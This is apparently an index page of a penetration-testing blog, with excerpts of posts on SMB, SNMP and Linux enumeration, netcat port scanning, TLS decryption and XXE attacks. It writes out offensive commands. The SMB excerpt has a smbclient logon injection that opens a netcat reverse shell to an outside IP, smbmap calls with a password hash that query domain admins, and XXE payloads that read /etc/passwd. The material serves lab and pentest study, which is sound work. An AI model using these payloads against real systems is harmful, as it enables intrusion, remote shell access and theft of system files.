There is no excerpt because this is a protected post.
Decrypting SSL/TLS Traffic with SSLSESSIONKEY and Wireshark
Decrypting SSL/TLS traffic from browser (Firefox / Chrome) is possible by using a SSL Session Key, that gets written to the system. (It seemed that Firefox removed this option to create SSLkeylogfile in one of the more recent versions) no
Port scanning – alternative
Alternative port scanning tools. Portscan with netcat Scans specific IP between tcp port 20 – 65000.
|
1 2 |
for i in $(seq 20 65000); do nc -zv 10.xx.xx.xx $i 2>&1;done | grep open |
Check open ports outbound from host with Wget Check outbound rules from specific host. If TCP SYN is received on tcpdump the outbound
SMB Enumeration
SMB Enumeration and recon notes. SMB null sessions are unauthenticated sessions against smb shares, and anonymous access to hidden shares is available. Connect and Enumerate Shares
|
1 2 3 4 5 6 |
nmblookup -A $IP enum4linux -a $IP rpcclient -U "" $IP |
smbclient
|
1 2 3 4 5 6 7 8 9 10 |
smbclient -L $IP smbclient //$IP/tmp smbclient \\\\$IP\\ipc$ -U john smbclient //$IP/ipc$ -U john smbclient //$IP/admin$ -U john |
smbmap
|
1 2 3 4 5 6 7 |
smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1 smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20 smbmap -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain' |
Command Execution via smbclient
|
1 2 3 4 |
smbclient //10.10.10.3/tmp logon “/=`nc 10.10.2.17 1233 -e /bin/bash`” |
Start nc listener from
Monitor bandwidth consumption with iptables
A method to measure how much bandwidth is consumed for e.g. a nmap scan against a specific host can be done with iptables in Linux. Run following to monitor bandwidth to and from 10.10.10.233:
|
1 2 3 4 |
iptables -I INPUT 1 -s 10.10.10.233 -j ACCEPT iptables -I OUTPUT 1 -d 10.10.10.233 -j ACCEPT iptables -Z |
Then run command against host,
SNMP Enumeration
Scan for SNMP and filter out IP addresses that runs SNMP:
|
1 2 |
nmap -sU --open -p 161 10.10.10.1-254 -oG -| awk '/Up$/{print $2}' |
or generate IP hosts with following command :
|
1 2 |
seq -f "10.10.10.%g" 1 254 > all-lab-ip.txt |
Run onesixtyone to grab SNMP info on all hosts from input file:
|
1 2 |
onesixtyone -i all-lab-ip.txt public |
Enumerate installed software on SNMP
Port knocking
Port knocking is a method of obscuring the services that you have running on your machine. It allows your firewall to protect your services until you ask for a port to be opened through a specific sequence of network traffic.
Linux Enum
Useful tools and methods to do Linux Enumeration. LinEnum.sh Collect Linux info – exploit suggest and priv escalation https://github.com/rebootuser/LinEnum.git
|
1 2 |
./LinEnum.sh -k password -r report -e /tmp/.a -t |
Linux-smart-enumeration https://github.com/diego-treitos/linux-smart-enumeration
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
./lse.sh Use: ./lse.sh [options] OPTIONS -c Disable color -i Non interactive mode -h This help -l LEVEL Output verbosity level 0: Show highly important results. (default) 1: Show interesting results. 2: Show all gathered information. -s SELECTION Comma separated list of sections or tests to run. Available sections: usr: User related tests. sud: Sudo related tests. fst: File system related tests. sys: System related tests. sec: Security measures related tests. ret: Recurren tasks (cron, timers) related tests. net: Network related tests. srv: Services related tests. pro: Processes related tests. sof: Software related tests. ctn: Container (docker, lxc) related tests. Specific tests can be used with their IDs (i.e.: usr020,sud) |
Linuxprivchecker.py https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123
|
1 2 |
python linuxprivchecker.py |
Linux Exploit Suggester https://github.com/jondonas/linux-exploit-suggester-2 https://github.com/mzet-/linux-exploit-suggester
|
1 2 |
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh |
Linux Soft Exploit Suggester https://github.com/belane/linux-soft-exploit-suggester
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
dpkg -l > package_list python linux-soft-exploit-suggester.py --file package_list Update exploit database: python linux-soft-exploit-suggester.py --update Basic usage: python linux-soft-exploit-suggester.py --file package_list Specify exploit db: python linux-soft-exploit-suggester.py --file package_list --db files_exploits.cve Use Redhat/Centos format file: python linux-soft-exploit-suggester.py --file package_list --distro redhat Search exploit for major version: python linux-soft-exploit-suggester.py --file package_list --level 4 Filter by remote exploits: python linux-soft-exploit-suggester.py --file package_list --type remote Search specific words in exploit title: python linux-soft-exploit-suggester.py --file package_list --filter Overflow Advanced usage: python linux-soft-exploit-suggester.py --file package_list --level 3 --type local --filter escalation |
pspy Enum
Vulnerability Scanning – OpenVAS
This post covers setting up OpenVAS9 Greenbone Security Assistant. The Dashboard: OpenVAS (Open Vulnerability Assessment System) is an opensource tool that can be used to discover security vulnerabilities on your network. OpenVAS uses NVTs (Network Vulnerability Tests) to actively scan
XXE/XML Attack
Malicious DTD Following snippet can be used to get Local File Inclusion or Remote Command Execution on vulnerable XML.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
<br /><?xml version=”1.0”?> <!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///flag.txt”> <!ELEMENT cred (username, password)> <!ELEMENT username (#PCDATA)> <!ELEMENT password (#PCDATA)> ]> <cred> <username>&xxe;</username> <password>dsfdsf</password> </cred> <?xml version=”1.0”?> <!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///etc/passwd”> <!ELEMENT subnet_mask ANY>]> <details> <subnet_mask>&xxe;</subnet_mask> <test></test> </details> |